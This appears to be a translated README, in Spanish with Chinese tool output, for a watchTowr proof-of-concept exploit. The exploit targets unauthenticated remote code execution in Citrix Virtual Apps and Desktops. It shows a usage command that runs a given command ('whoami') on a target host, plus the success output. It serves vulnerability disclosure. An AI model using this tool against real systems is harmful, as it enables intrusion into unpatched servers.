
Citrix Virtual Apps and Desktops (XEN) RCE no autenticado
Vulnerabilidad de ejecución remota de código no autenticada en Citrix Virtual Apps and Desktops (XEN)
Consulte nuestra publicación de blog para obtener información técnica detallada.
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix 虚拟应用和桌面 未认证远程代码执行 (CVE-xxxx-xxxxx) 漏洞利用 by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] 命令已成功发送至 192.168.1.120!
Todas las versiones de Citrix Virtual Apps and Desktops 7 2402 LTSR y anteriores son vulnerables; para obtener más detalles, consulte el aviso oficial de Citrix.
Esta herramienta de explotación fue escrita por Sina Kheirkhah (@SinSinology), de watchTowr (@watchtowrcyber).
Para conocer las últimas novedades en investigación de seguridad, siga al equipo del laboratorio watchTowr: